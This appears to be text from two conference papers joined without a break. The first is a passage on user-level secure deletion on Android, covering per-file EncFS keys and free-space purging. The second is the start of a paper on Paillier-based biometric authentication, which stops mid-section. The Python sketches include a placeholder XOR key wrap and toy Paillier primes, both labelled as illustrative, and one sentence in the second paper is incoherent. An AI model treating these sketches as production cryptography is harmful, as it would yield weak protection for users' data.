Unfortunately, besides the fact that deleted data are not
actually destroyed on the device, logical deletion has the
additional drawback that ordinary users are generally unable
to completely remove their files, while advanced users or
adversaries can easily recover logically deleted files.
Deleting a file from a storage medium serves two
purposes: (i) it reclaims storage for the operating system and (ii)
ensures that any sensitive information contained in the file
becomes inaccessible. The second purpose requires that files
are securely deleted.
Secure data deletion can be defined as the task of
deleting data from a physical medium so that the data is
irrecoverable. That means its content does not persist on the
storage medium after the secure deletion operation.
Secure deletion enables users to protect the
confidentiality of their data if their device is logically
compromised (e.g., hacked) or stolen. Until recently, the
only user-level deletion solution available for mobile devices
was the factory reset, which deletes all user data on the
device by returning it to its initial state. However, the
assurance or security of such a deletion cannot be taken for
granted, as it is highly dependent on the device's manufacturer.
Also, it is inappropriate for users who wish to selectively
delete data, such as some files, but still retain their address
books, emails and installed applications.
Older technologies [14] claim to securely delete files by
overwriting them with random data. However, due to the nature
of the log-structured file systems used by most flash cards, this
solution is no more effective than logically deleting the file,
since the new copy invalidates the old one but does not
physically overwrite it. Old secure deletion approaches that
work at the granularity of a file are inadequate for mobile
devices with flash memory cards.
Today, secure deletion is not only useful before
discarding a device. On modern mobile devices, sensitive
data can be compromised at unexpected times by adversaries
capable of obtaining unauthorized access to it. Therefore,
sensitive data should be securely deleted in a timely fashion.
Secure deletion approaches that target sensitive files, in
the few cases where it is appropriate, must also address
usability concerns. A user should be able to reliably mark
their data as sensitive and subject to secure deletion. That is
exactly the case when a file is securely removed from an
encrypted file system.
On the other hand, approaches that securely delete all
logically deleted data, while less efficient, suffer no false
negatives. That is the case for purging techniques.
III. RELATED WORK
This section briefly describes related work on the subjects
of secure deletion and encrypted file systems on mobile
devices, particularly Android.
The use of cryptography as a mechanism to securely
delete files was first discussed by Boneh and Lipton [6].
Their paper presented a system which enables a user to
remove a file from both file system and backup tapes on
which the file is stored, just by forgetting the key used to
encrypt the file.
Gutmann [14] covered methods available to recover erased
data and presented practical solutions to make recovery
from magnetic media significantly more difficult for an
adversary. In fact, the paper covered only magnetic media
and, to a lesser extent, RAM. Flash memory barely existed
at the time it was written, so it was not considered.
Sun et al. [12] proposed an efficient secure
deletion scheme for flash memory storage. This solution
resides inside the operating system and close to the memory
card controller.
Diesburg and Wang [16] presented a survey summarizing
and comparing existing methods of providing confidential
storage and deletion of data in personal computing
environments, including flash memory issues.
Wang et al. [19] present a FUSE (Filesystem in
Userspace) encryption file system to protect both
removable and persistent storage on devices running the
Android platform. They concluded that the encryption
engine was easily portable to any Android device and the
overhead due to encryption is an acceptable trade-off for
achieving the confidentiality requirement.
Reardon et al. [7]-[11] have published a substantial body of results
concerning both encrypted file systems and secure deletion.
First, Reardon et al. [11] propose the Data Node Encrypted
File System (DNEFS), which uses on-the-fly encryption and
decryption of file system data nodes to efficiently and
securely delete data on flash memory systems. DNEFS is a
generic modification of existing flash file systems or
controllers that enables secure data deletion. Their
implementation extended a Linux implementation and was
integrated into the Android operating system, running on a
Google Nexus One smartphone.
Reardon et al. [7] also propose user-level solutions for
secure deletion in log-structured file systems: purging,
which provides guaranteed time-bounded deletion of all data
previously marked to be deleted, and ballooning, which
continuously reduces the expected time that any piece of
deleted data remains on the medium. The solutions
empower users to ensure the secure deletion of their data
without relying on the manufacturer to provide this
functionality. These solutions were implemented on an
Android smartphone (Nexus One), and experiments have
shown that they neither prohibitively reduce the longevity of
flash memory nor noticeably reduce the device's battery
lifetime.
In two recent papers, Reardon et al. [8][9] study the issue
of secure deletion in detail. First [9], they identify ways to
classify different approaches to securely deleting data. They
also describe adversaries that differ in their capabilities and
show how secure deletion approaches can be integrated into
systems at different interface layers. Second [8], they survey
the related work in detail and organize existing approaches
in terms of their interfaces to physical media. They further
present a taxonomy of adversaries differing in their
capabilities, as well as a systematization of the characteristics
of secure deletion approaches.
More recently, Reardon et al. [10] presented a general
approach to the design and analysis of secure deletion for
persistent storage that relies on encryption and key
wrapping.
Finally, Skillen and Mannan [4] designed and
implemented a system called Mobiflage that enables
plausibly deniable encryption (PDE) on mobile devices by
hiding encrypted volumes within random data on a device’s
external storage. They also provide [3] two different
implementations for the Android OS to assess the feasibility
Figure 1. Extending an encrypted file system for secure deletion: an encrypted file system with a single master key (left) versus one with a single key per file (right), where PBE derives the master key MK, a KDF derives FSEK from MK, and FSEK encrypts each file's FEK and F_ID.
and performance of Mobiflage: one for removable SD cards
and the other for an internal partition holding both apps and
user-accessible data.
IV. DESCRIPTION OF PROPOSED SOLUTION
The rationale behind the proposed solution is the practical
possibility of performing secure deletion of files from
ordinary Android applications, in user mode, without
administrative privileges or operating system customization.
The solution handles two cases, according to where the file,
already deleted or about to be deleted, is stored:
1) The file is kept by the encrypted file system;
2) A file or a set of files was logically deleted by the
operating system and their locations are unknown.
A. Secure Deletion of Encrypted Files
The simplest way to securely delete a file from an
encrypted file system is to simply discard the encryption key
of that file and then logically remove the file.
This method does not need memory cleaning (purging) and
is very fast. A prototype was built upon an Android port for
the EncFS encrypted file system [18][19]. To accomplish
this task, the way EncFS manages cryptographic keys had to
be modified. EncFS encrypts all files with a single master
key derived from a password-based encryption (PBE)
function. It is clearly not feasible to change the master key
and re-encrypt the whole file system every time a single file
is deleted. On the other hand, if each file were encrypted
with its own key, then that key could easily be thrown away,
rendering the file irrecoverable. The modification to EncFS
consists of the following steps:
a) Use PBE to derive a master key MK;
b) Use a key derivation function (KDF) to derive a file
system encryption key FSEK from MK;
c) Use an ordinary key generation function (e.g., PRNG)
to generate a file encryption key FEK;
d) Encrypt each file, along with its name, using its FEK,
and encrypt the FEK with FSEK and a random IV;
e) Keep a mapping from each pair FEK||IV to its
encrypted file.
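The steps above can be sketched in Python (an illustrative model, not the actual EncFS code: the HMAC keystream used to wrap the FEK and the in-memory key_table stand in for a real cipher and for the SQLite table described below):

```python
import hashlib, hmac, os

def derive_master_key(password: bytes, salt: bytes) -> bytes:
    # a) PBE: derive the master key MK from a password (PBKDF2, as in [5])
    return hashlib.pbkdf2_hmac("sha256", password, salt, 100_000, dklen=32)

def derive_fsek(mk: bytes) -> bytes:
    # b) KDF: derive the file system encryption key FSEK from MK
    return hmac.new(mk, b"FSEK", hashlib.sha256).digest()

def generate_fek() -> bytes:
    # c) a fresh 256-bit file encryption key per file
    return os.urandom(32)

def wrap_fek(fsek: bytes, fek: bytes, iv: bytes) -> bytes:
    # d) encrypt FEK under FSEK and a random IV (XOR with an HMAC
    #    keystream here; a real system would use proper key wrapping)
    stream = hmac.new(fsek, iv, hashlib.sha256).digest()
    return bytes(a ^ b for a, b in zip(fek, stream))

# e) mapping {wrapped FEK, IV} -> file (the prototype keeps this in SQLite)
key_table = {}

def register_file(fsek: bytes, path: str) -> bytes:
    fek, iv = generate_fek(), os.urandom(32)
    key_table[path] = (wrap_fek(fsek, fek, iv), iv)
    return fek  # used to encrypt the file's content and name

def secure_delete(path: str) -> None:
    # discarding the key entry makes the ciphertext irrecoverable
    del key_table[path]
```

Unwrapping is the same XOR with the same keystream; once the table entry is gone, the per-file key, and hence the file, cannot be reconstructed.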
A simple way to keep that mapping is to have a table file
stored in user space as application data. Care must be
taken to avoid accidentally or purposely removing that file
when cleaning the device's user space. On Android devices, this
can be done by rewriting the default activity responsible for
deleting application data. An application-specific delete
activity would provide selective deletion of application
data, or deny any deletion at all. Removing the FEK and IV
from the table makes a file irrecoverable. The ordinary
delete operation then returns the file's storage space to the
operating system. Figure 1 depicts the solution.
Another way to keep track of keys and files is to store the
pair {FEK, IV} inside the encrypted name of the encrypted
file. In this situation, a file has to be renamed before being
removed from the encrypted file system. The rename
operation destroys the FEK and makes the file irrecoverable.
The ordinary delete operation then returns the storage space
to the operating system.
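This rename-based variant can be sketched as follows (hypothetical helper names; a real implementation would embed the wrapped {FEK, IV} pair inside the encrypted file name itself rather than as a plain suffix, and would encrypt the content with that key):

```python
import base64, os

def create_with_embedded_key(directory: str, content_name: str) -> str:
    # embed the pair {FEK, IV} in the stored file name
    fek, iv = os.urandom(32), os.urandom(16)
    stored = content_name + "." + base64.urlsafe_b64encode(fek + iv).decode()
    # ... encrypt and write the file under `stored` using fek/iv ...
    open(os.path.join(directory, stored), "wb").close()
    return stored

def secure_delete_by_rename(directory: str, stored: str) -> None:
    # renaming to a random name destroys the metadata holding the key;
    # an ordinary delete then returns the space to the operating system
    anonymous = base64.urlsafe_b64encode(os.urandom(12)).decode()
    os.rename(os.path.join(directory, stored),
              os.path.join(directory, anonymous))
    os.remove(os.path.join(directory, anonymous))
```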
It is interesting to note that the proposed solution
helps solve some known security issues of EncFS
[13][17]. By using distinct keys for every file, a Chosen
Ciphertext Attack (CCA) against the master key is inhibited.
Also, it reduces the impact of IV reuse across encrypted files.
Finally, it eliminates the watermarking vulnerability, because
a single file imported twice to EncFS will be encrypted with
two distinct keys and IVs.
In the prototype, the key derivation function is based on the
PBKDF2 standard [5], keys and IVs are both 256 bits long, and
the table mapping {key, IV} pairs to files is kept in an
SQLite database accessible only by the application.
B. Secure Deletion of Ordinary Files
In this context, a set of files was logically deleted by
the operating system on behalf of the user, but the files left
sensitive garbage in memory. Traditional solutions that
purge the memory cells occupied by those files are ineffective here,
because there is no way to know, from the user's point of view,
where the purging data will be written.
An instance of this situation occurs when a temporary file
is left behind by an application and manually deleted. This
temporary file may be a decrypted copy of an encrypted file
kept by the encrypted file system. Temporary unencrypted
copies of files are necessary in order to allow other
applications to handle specific file types, e.g., images,
documents, and spreadsheets.
Whether or not temporary files will be imported
back to the encrypted file system, they have to be securely
removed anyway. A premise is that the files to be removed
are not in use by any application. The secure deletion occurs
in three steps:
1) Logically remove the targeted files with ordinary deletion;
2) Write a temporary file of randomized content that
occupies all of the memory's free space;
3) When there is no free space left, logically delete
that random file. That action purges all free memory in a
way that no sensitive data is left behind.
The final result of this procedure is a flash storage free of
sensitive garbage. Steps two and three can be encapsulated as
a single function, called memory purging, and performed by
an autonomous application. That application would be
activated by the user whenever she needs to clean memory
from sensitive garbage. The proposed solution adopted this
implementation.
Unfortunately, this procedure has two drawbacks. First, it
takes time proportional to the size of the free space to be
cleaned and to the speed of memory writes. Second, in the
long term, if used with high frequency, it has the potential
to shorten the lifetime of flash memories.
In order to minimize the negative impact over memory
life and avoid excessive delays during operation, steps two
and three from above should not be carried out for every
single file deleted from the system.
C. Limitations of the solution
The protection of cryptographic keys is of major
importance. Although keys are stored encrypted, decrypted
just before being used, and then released, their protection
relies on Android security and the application confinement
provided by that operating system.
The proposed solution for memory purging is supposed
to work in user-mode, as an ordinary mobile app, without
administrative access, with no need for operating system
modification, and using COTS devices. These decisions have
consequences for security.
First of all, the solution is highly dependent on the way
flash-based file systems and controllers behave. Briefly
speaking, when the flash storage is updated, the file system
writes a new copy of the changed data to a fresh memory
block, remaps file pointers, and then erases the old memory
blocks when possible, but with no guarantee. This constrained design
actually enables the alternatives discussed in Section VI.
A second issue is that the solution is not specifically
concerned about the type of physical memory (e.g., internal,
external SD, NAND, and NOR) as long as it behaves like a
flash-based file system. The consequence is that only
software-based attacks are considered and physical attacks
are out of scope.
Finally, the use of random files is not supposed to have
any effect on the purging assurance, but provides a kind of
low-cost camouflage for cryptographic material (e.g., keys or
parameters) accidentally stored on persistent media. An
entropy analysis would not be able to easily distinguish
specific random data as potential security material, because
huge amounts of space would look random. Of course, this
software-based camouflage cannot be the only way to
prevent such attacks, but it adds to a defense in depth
approach to security at almost no cost.
V. PERFORMANCE EVALUATION OF SECURE DELETION
Table I shows performance measurements for the secure
deletion of ordinary files by purging. The measurements
were taken on two smartphones: (i) LG Prada p940h, with 4
GB of internal storage available and Android 2.3.7; and (ii)
Motorola Atrix with 16 GB (only 11 GB available to the final
user) of internal storage and Android 2.3.6. File recovery
was performed with the PhotoRec recovery tool [15]. Random
files created for purging had a size of at most 2 GB.
Tests were performed over internal memory in three
conditions: memory almost free (few files), memory half
occupied (many files), and memory free (no files at all). The
test procedure consisted of the following steps: (a) creation
of ordinary content; (b) logical deletion of that content; (c)
TABLE I. TESTING SECURE DELETION.

LG Prada p940h       | Few files | Many files | No files
Free before purging  | ~3.9 GB   | 2.21 GB    | 3.98 GB
Purging time         | 4min19s   | 2min37s    | 4min24s

Motorola Atrix       | Few files | Many files | No files
Free before purging  | ~10 GB    | 5.2 GB     | 10.59 GB
Purging time         | 18min51s  | 10min53s   | 19min22s
execution of the secure deletion procedure; and (d) attempted
recovery of the content. Tests have shown that secure deletion time
is proportional to memory size and quite similar to recovery
time, as was expected. LG Prada was cleaned at a rate of one
Gigabyte per minute (1 GB/min). Motorola Atrix was
cleaned at a rate of half Gigabyte per minute (0.5 GB/min).
Additionally, a test over a class C SD card of 4 GB was
carried out at 0.25 GB/min. In all cases, PhotoRec was
unable to recover securely deleted files.
VI. IMPROVEMENTS UNDER DEVELOPMENT
The solution for memory purging is the simplest
implementation of a general policy for purging flash
memories. In fact, a general solution has to offer different
trade-offs among security requirements, memory life, and
system responsiveness. The authors have identified three
points for customization:
1. The period of execution of the purging procedure;
2. The size and quantity of random files;
3. The frequency of file creation/deletion.
At the time of writing, different trade-offs among the
three customization points identified above were being
implemented and evaluated. In all of them, the random file
created in order to clean memory space is called a bubble,
after the metaphor of soap bubbles cleaning a dirty
surface. These alternatives are discussed in the next subsections.
A. Static single bubble
The solution described in this text implements the idea of
a single static bubble that increases in size until it reaches the
limit of free space, and then bursts. This solution is adequate
for the cases when memory has to be cleaned in the shortest
period of time, with no interruption. A disadvantage is that
other concurrent applications can starve for storage space. This
solution is adequate when nothing else is happening but the
purging.
B. Moving or sliding (single) bubble
In this alternative, a single bubble periodically moves
or slides from one place to another. The moving bubble
has a size equal to a fraction of the free space. For example, if
the bubble size is 1/n of the free space, the moving bubble
covers all free memory after n moves, assuming the amount
of free space does not change. A move is simply the rewriting
of the bubble file, since flash memories perform a rewrite in a
different place.
In a period of time equal to T*(n/2), where T is the time
between moves, the chance of finding sensitive garbage in
memory is 50%. This solution is adequate when memory has
low to moderate usage by concurrent applications. It
preserves system responsiveness (usability) but diminishes
security.
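The coverage argument can be illustrated with a toy simulation (our own model, not from the paper: free space is treated as n equal-sized slots, and the flash layer is assumed to place each rewrite on a fresh slot):

```python
def simulate_moving_bubble(n: int, moves: int) -> float:
    """Fraction of free-space slots purged after `moves` bubble rewrites.

    The bubble occupies 1/n of the free space; each move rewrites the
    bubble file, and the flash layer places the new copy on a fresh slot,
    leaving only random data where the old copy was.
    """
    purged = set()
    for move in range(moves):
        slot = move % n          # fresh slot chosen by the controller
        purged.add(slot)
    return len(purged) / n

# after n moves the bubble has covered all free memory
assert simulate_moving_bubble(8, 8) == 1.0
# after n/2 moves, half the free space may still hold sensitive garbage
assert simulate_moving_bubble(8, 4) == 0.5
```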
C. Moving or sliding (multiple) bubbles
This alternative uses more than one bubble instead of a
single one. The size and number of bubbles are fixed. For
instance, if the bubble size is 1/n of the free space, two moving
bubbles cover all free memory after n/2 moves each. The
advantage of this method is to potentially accelerate memory
coverage, reducing the window of opportunity for memory
compromise. In the example, two bubbles of size 1/n each can
move every T/2 period, concluding in T*n. Alternatively,
they can move at period T and terminate in 2*T*n, and so
on. This solution is adequate when memory has moderate
usage by concurrent applications. It is probabilistic in the
sense that the smaller the duration of T and the greater the
size of the bubbles, the greater the chance of successfully
cleaning all memory.
D. Sparkling bubbles
This solution varies the size and number of bubbles. The
idea is to create a set of mini bubbles that are scattered
over the free memory. Bubbles are created and immediately
removed at period T, which can be constant or random
between zero and T. The sparkling of bubbles stops when the
sum of the sizes of all created bubbles surpasses the free space.
The bubble size can be small enough not to affect other
applications.
This solution is adequate when memory has moderate to
high usage by concurrent applications. It is probabilistic in
the sense that the smaller the duration of T, the greater the
chance of successfully cleaning the whole memory.
VII. CONCLUDING REMARKS
This paper discussed the implementation of two user-level
approaches to the secure deletion of files. One works on
secure deletion of encrypted files and the other handles the
deletion assurance of ordinary (unencrypted) files. Secure
deletion of encrypted files was fully integrated into an
encrypted file system and is transparent to the user. Secure
deletion of ordinary files was fulfilled by an autonomous
application activated at the discretion of the user. Preliminary
performance measurements have shown that the approach is
feasible and offers a trade-off between time and deletion
assurance. Further tests have to be performed to fine-tune the
solution in order to preserve system responsiveness. Also, a
deeper security assessment has to be performed in order to
establish the actual extent of the security provided by the
proposed solution.
ACKNOWLEDGMENT
The authors acknowledge the financial support given to
this work, under the project "Security Technologies for
Mobile Environments – TSAM", granted by the Fund for
Technological Development of Telecommunications –
FUNTTEL – of the Brazilian Ministry of Communications,
through Agreement Nr. 01.11.0028.00 with the Financier of
Studies and Projects – FINEP/MCTI.
REFERENCES
[1] A. M. Braga, E. Nascimento, and L. Palma, "Presenting the Brazilian
Project TSAM – Security Technologies for Mobile Environments", in
Proceedings of the 4th International Conference on Security and
Privacy in Mobile Information and Communication Systems
(MobiSec 2012), LNICST vol. 107, 2012, pp. 53-54.
[2] A. M. Braga, "Integrated Technologies for Communication Security
on Mobile Devices", The Third International Conference on Mobile
Services, Resources, and Users (Mobility'13), 2013, pp. 47-51.
[3] A. Skillen and M. Mannan, "Mobiflage: Deniable Storage Encryption
for Mobile Devices", IEEE Transactions on Dependable and Secure
Computing, vol. 11, no. 3, May-June 2014, pp. 224-237.
[4] A. Skillen and M. Mannan, "On Implementing Deniable Storage
Encryption for Mobile Devices", in 20th Annual Network &
Distributed System Security Symposium, February 2013, pp. 24-27.
[5] B. Kaliski, RFC 2898, PKCS #5: Password-Based Cryptography
Specification Version 2.0. Retrieved [July 2014] from
http://tools.ietf.org/html/rfc2898.
[6] D. Boneh and R. J. Lipton, "A Revocable Backup System", in
USENIX Security, 1996, pp. 91-96.
[7] J. Reardon, C. Marforio, S. Capkun, and D. Basin, "User-level secure
deletion on log-structured file systems", in Proceedings of the 7th
ACM Symposium on Information, Computer and Communications
Security, 2012, pp. 63-64.
[8] J. Reardon, D. Basin, and S. Capkun, "SoK: Secure data deletion", in
IEEE Symposium on Security and Privacy, 2013, pp. 301-315.
[9] J. Reardon, D. Basin, and S. Capkun, "On Secure Data Deletion",
IEEE Security & Privacy, vol. 12, no. 3, May-June 2014, pp. 37-44.
[10] J. Reardon, H. Ritzdorf, D. Basin, and S. Capkun, "Secure data
deletion from persistent media", in Proceedings of the 2013 ACM
SIGSAC Conference on Computer & Communications Security (CCS
'13), ACM, New York, NY, USA, 2013, pp. 271-284.
[11] J. Reardon, S. Capkun, and D. Basin, "Data Node Encrypted File
System: Efficient secure deletion for flash memory", in USENIX
Security Symposium, 2012, pp. 333-348.
[12] K. Sun, J. Choi, D. Lee, and S. H. Noh, "Models and Design of an
Adaptive Hybrid Scheme for Secure Deletion of Data in Consumer
Electronics", IEEE Transactions on Consumer Electronics, vol. 54,
no. 1, Feb. 2008, pp. 100-104.
[13] M. Riser, "Multiple Vulnerabilities in EncFS", 2010. Retrieved [July
2014] from http://archives.neohapsis.com/archives/fulldisclosure/
2010-08/0316.html.
[14] P. Gutmann, "Secure deletion of data from magnetic and solid-state
memory", in Proceedings of the Sixth USENIX Security Symposium,
San Jose, CA, vol. 14, 1996.
[15] PhotoRec, Digital Picture and File Recovery. Available [July 2014]
from http://www.cgsecurity.org/wiki/PhotoRec.
[16] S. M. Diesburg and A. I. A. Wang, "A survey of confidential data
storage and deletion methods", ACM Computing Surveys (CSUR),
vol. 43, no. 1, article 2, 2010.
[17] T. Hornby, "EncFS Security Audit". Retrieved [July 2014] from
https://defuse.ca/audits/encfs.htm.
[18] V. Gough, "EncFS Encrypted Filesystem", stable release 1.7.4
(2010). Available [July 2014] from http://www.arg0.net/encfs.
[19] Z. Wang, R. Murmuria, and A. Stavrou, "Implementing and
optimizing an encryption filesystem on Android", in IEEE 13th
International Conference on Mobile Data Management (MDM),
2012, pp. 52-62.
Performance Impacts in Database Privacy-Preserving Biometric Authentication
Jana Dittmann, Veit Köppen
Christian Krätzer, Martin Leuckert, Gunter Saake
Claus Vielhauer
Faculty of Computer Science
Otto-von-Guericke University
Email: [jana.dittmann|vkoeppen|
kraetzer|gunter.saake]@ovgu.de
Department of Informatics and Media
Brandenburg University of Applied Sciences
Email: vielhauer@fh-brandenburg.de
Abstract—Nowadays, biometric data are more and more used
within authentication processes. These data are often stored
in databases. However, these data underlie inherent privacy
concerns. Therefore, special attention should be paid to the handling
of these data. We propose an extension of a similarity verification
system with the help of the Paillier cryptosystem. In this paper,
we use this system for signal processing in the encrypted domain
for privacy-preserving biometric authentication. We adapt a
biometric authentication system for enhancing privacy. We focus
on performance issues with respect to database response time
for our authentication process. Although encryption implicates
computational effort, we show that only small computational
overhead is required. Furthermore, we evaluate our implementation with respect to performance. However, the concept of
verification of encrypted biometric data comes at the cost of
increased computational effort in contrast to already available
biometric systems. Nevertheless, currently available systems lack
privacy-enhancing technologies. Our findings emphasize that a
focus on privacy in the context of user authentication is achievable.
This solution leads to user-centric authentication applications. As an
additional benefit, data mining results in the domain of user tracking
become more difficult to obtain.
Index Terms—Database Security, Homomorphic Encryption,
Privacy, Multi-Computer Scenarios, Database Performance
I. MOTIVATION
Biometric data are more and more used in daily life. However,
these data underlie privacy concerns by design, because they are
directly related to individuals. As a result, they may potentially
be misused, e.g., by means of replay attacks, once accessible by
malicious parties. Therefore, biometric data
require protection mechanisms to take advantage of positive
aspects of an authentication scheme. So, privacy-preserving
biometric authentication is a requirement that comes into focus
of databases, which form the core of any biometric system. In
this paper, we present a new approach for user authentication
based on the assumption that encrypted data have to be stored
and at the same time there is no logging information available.
Although data might be deleted from a database, it can be
possible to restore the information partially or even completely.
Grebhahn et al. [1] present an approach for deleting data
in a database where, at the same time, the information could
be completely recovered. Although new approaches exist to
cover this information or even to improve the system for
Figure 1. Enrollment and Authentication Pipeline: a behavioral or physiological trait passes through data acquisition (raw data), preprocessing (raw feature data), and feature extraction (discrete feature vector); during enrollment the feature vector is stored in the reference storage, while during authentication it is compared and classified to produce the authentication result.
secure deletion [2], an overall security of traditional database
management systems with respect to such information leakage
cannot be guaranteed.
In a biometric authentication system, two phases are
differentiated [3]. Firstly, a user has to create a specific biometric
template. In practice, these templates are typically stored in a
database. To ensure that only required information is stored, the
data acquisition (e.g., by using sensors) is followed by a data
preprocessing step that filters out noise and unrelated information
from the raw data. Note that the required information is often depicted
in a feature space. Secondly, a feature extraction is applied,
followed by a discretization of the feature values. Finally,
the feature vector is stored. This phase is called enrollment.
We show the basic steps in Figure 1 on the left side.
The second phase is called authentication, where a classification is required to declare an identity of the biometric
features. We depict this pipeline on the right side of Figure 1.
The first steps from data acquisition to the discrete feature
vector should be applied in the same manner as in the
enrollment phase. Otherwise, it cannot be guaranteed that
the same properties are compared. However, the data for
authentication are not stored. In the comparison step, if a
one-to-one matching is performed, we call the authentication
verification [3]. Another classification scheme is identification,
where a biometric discrete feature vector is compared to a
set of templates from the database. In both schemes, usually a
threshold is used to decide on the success of the authentication.
In case the threshold does not influence the comparison of
templates, the result set of an identification can be the closest
match, all, the k-nearest, or the ε-distance neighbors. With these
result sets, further analyses are possible, e.g., data mining or
optimization approaches possible. For instance, it is possible
to use index structures within the database system for an
enhanced data access. However, such index structures need to
be carefully optimized for a multi-dimensional feature space,
see [4] for further details. Another approach is to preserve
privacy in the context of deletion in database index structures
as described in [2].
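The two comparison schemes can be sketched as follows (a minimal illustration using Euclidean distance; real biometric systems use far richer feature spaces and matchers):

```python
import math

def distance(a, b):
    # Euclidean distance between two discrete feature vectors
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))

def verify(probe, template, threshold):
    # verification: one-to-one matching against a claimed identity
    return distance(probe, template) <= threshold

def identify(probe, database, threshold):
    # identification: one-to-many matching; return every template
    # within the threshold, closest match first
    hits = [(distance(probe, t), user) for user, t in database.items()]
    return sorted((d, u) for d, u in hits if d <= threshold)
```

Dropping the threshold filter in identify yields the other result sets mentioned above (closest match, all, or k-nearest by truncating the sorted list).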
Data mining enables users to detect patterns that are hidden
in complex data. With the use of computational techniques, it
is also possible to observe and identify relations in the context
of privacy preserving scenarios, see for instance [5], [6], or [7].
The work presented in this paper is based on a master's thesis [8] and summarizes its main results. We present a methodology based on the Paillier cryptosystem [9] to improve privacy for users of authentication systems. In our evaluation section, we present a cross-evaluation of the impact of homomorphic encryption on biometric authentication using a database. The Paillier system is an asymmetric cryptographic scheme with additive homomorphic properties. With our new approach, both unique identifiers need to be decrypted for every message. As a result, a disclosure of either key becomes more unlikely, user tracing becomes less likely, and the pads do not immediately reveal user content data.
The remainder of this paper is structured as follows: In Section II, we briefly describe the current state of the art regarding our new approach. In Section III, we present the architectural requirements. Our extension of the secure similarity verification is given in Section IV. The evaluation of our approach regarding performance is part of Section V, where we show that the response times come with only a small computational overhead for the privacy-preserving aspects. These findings are in line with theoretical considerations and assumptions. Finally, we conclude our results and give a short outlook in Section VI.
II. BACKGROUND AND RELATED WORK
In this section, we present related work for preserving privacy in a biometric authentication context. As important factors, we concentrate on homomorphic encryption as well as deletion in database systems.
The general security requirements for a biometric authentication system are summarized in [10]. There, it is shown that all security aspects [11] become relevant for all enrollment and verification/identification related components as well as all data transitions between them. Privacy issues are mainly related to confidentiality, but require integrity, authenticity, availability, and non-repudiation of privacy-related data. For each security aspect, a security level can also be introduced, e.g., ranging from none over low up to high.
Security plays a vital role due to the different scenarios in which an attack on personal data is imaginable. On a first level, attacks can be differentiated into passive and active attacks. In passive attacks, the data stream between sender and recipient is not influenced; only the reading of data is the target of such attacks. Beyond just reading data, a specialization is frequency analysis, where, for instance, for a substitution cipher an analysis of letter frequencies is used to identify a mapping. Different extensions are applicable, e.g., frequency attacks or domain attacks [12].
Protection mechanisms for such biometric reference systems have existed for more than a decade; prominent examples are BioHashes [3], the Fuzzy Commitment Scheme [13], and the Fuzzy Vault [14]. For an overview of challenges for biometric template protection and further current protection schemes, see [15]. All these established protection schemes require data to be compared in an unencrypted form, which leads to the threat of information leakage as discussed in Section I. Therefore, these mechanisms are not relevant for the work presented in this paper.
A. Homomorphic Encryption
Homomorphic encryption is used to perform data operations on the cipher text that have a corresponding operation on the plain text data. In homomorphic encryption, operations op∗ can be performed on encrypted data that correspond to operations op on the plain text. This means that the following formula holds:
op(x) = decryption(op∗(encryption(x))).    (1)
In such a case, the mapping is structure preserving. The operations op and op∗ depend on the cryptosystem. There exist additive and multiplicative homomorphic cryptosystems. Gentry [16] proved the existence of a fully homomorphic encryption scheme, so it is possible to perform arbitrary operations on data without possessing a decryption key. However, such systems require a high computational effort. In this paper, we make use of homomorphic encryption to perform operations for authentication in an encrypted domain.
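The additive homomorphic property of the Paillier cryptosystem [9] can be demonstrated with a toy implementation. The following sketch uses deliberately tiny, hard-coded primes for illustration only (a real deployment would use key lengths of 2,048 bit or more) and the common simplification g = n + 1:

```python
import random
from math import gcd

def lcm(a, b):
    return a * b // gcd(a, b)

def paillier_keygen(p=1789, q=1861):
    # Toy primes for illustration; real keys are much larger.
    n = p * q
    lam = lcm(p - 1, q - 1)
    g = n + 1                       # common simplification for the generator
    mu = pow(lam, -1, n)            # valid precisely because g = n + 1
    return (n, g), (lam, mu)

def encrypt(pk, m):
    n, g = pk
    r = random.randrange(1, n)
    while gcd(r, n) != 1:           # r must be a unit modulo n
        r = random.randrange(1, n)
    return (pow(g, m, n * n) * pow(r, n, n * n)) % (n * n)

def decrypt(pk, sk, c):
    n, _ = pk
    lam, mu = sk
    x = pow(c, lam, n * n)
    return (((x - 1) // n) * mu) % n   # L(x) = (x - 1) / n

pk, sk = paillier_keygen()
c1, c2 = encrypt(pk, 42), encrypt(pk, 17)
# Additive homomorphism: multiplying ciphertexts adds the plaintexts.
assert decrypt(pk, sk, (c1 * c2) % (pk[0] ** 2)) == 42 + 17
```

Note that the random factor r makes the scheme probabilistic: encrypting the same plaintext twice yields different ciphertexts, which is relevant for the tracking discussion in Section IV.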
B. Verification of Homomorphically Encrypted Signals
Rane et al. [17] [18] developed an authentication scheme with adjustable fault tolerance. This is especially important for noisy sensor data. Due to error correction and similarity verification, Rane's method can be applied to a wide range of biometric traits.
In their application, three participants are involved in a multi-computer scenario. The first participant provides the biometric signals, while the second acts as the central storage server for all biometric templates. The third participant is responsible for verification. However, this participant is seen as vulnerable and therefore is not allowed to query the database system (DBS).
C. Secure Deletion in Databases
Databases can often reveal more information than intended. If an entry is deleted from the data collection, it is mandatory to prevent reconstruction of the data afterward. Stahlberg et al. [19] and Grebhahn et al. [1] explain how data can be reconstructed from metadata or system copies. Furthermore, DBS-specific data, such as index structures, can also be used for the reconstruction of deleted data. This means that even if no data are left, the system-inherent data structures can be used to gain information from fully deleted data tuples. Therefore, privacy awareness for database tuning, as described in [2], is required for biometric DBS to guarantee data privacy, which is especially challenging for multi-dimensional data [20].
Apart from a possible reconstruction of previously erased data, saved data can reveal additional information. For instance, the number of queries for a data tuple can give an idea about whom that tuple belongs to. This kind of confidentiality vulnerability needs to be addressed early, at the stage of the database layout. Not all security risks can be solved at this stage of the design, but a good database layout can indeed be the foundation of a secure system.
III. ARCHITECTURE FOR PRIVACY-PRESERVING AUTHENTICATION
In a general authentication setup, there are two instances that have to share information with each other. On the one side, there is a participant using a sensor to authenticate a claimed identity. On the other side, there is a reference DBS containing the enrolled data of all registered users. The DBS is considered to be semi-trustworthy, which means the data in this system shall never be available to the database holder without any kind of restriction or encryption. For that reason, a system allowing database authentication without revealing any information to the database holder needs to be applied. Furthermore, it has to be impossible to decrypt data without having the secret key. The solution used in this paper to address this issue is homomorphic encryption. Here, we use the Paillier cryptosystem as described in [9]. We slightly extend this scheme with user-definable key lengths for the purpose of the performance evaluations presented in Section V.
In Figure 2, we present a simplified pipeline of a verification process. Note that in this scenario a compromised DBS administrator could keep track of the order of enrolled employees; therefore, sequential IDs have to be avoided. The same holds for timestamps and other metadata. Consequently, it is essential to disable any logging of enrollment steps.
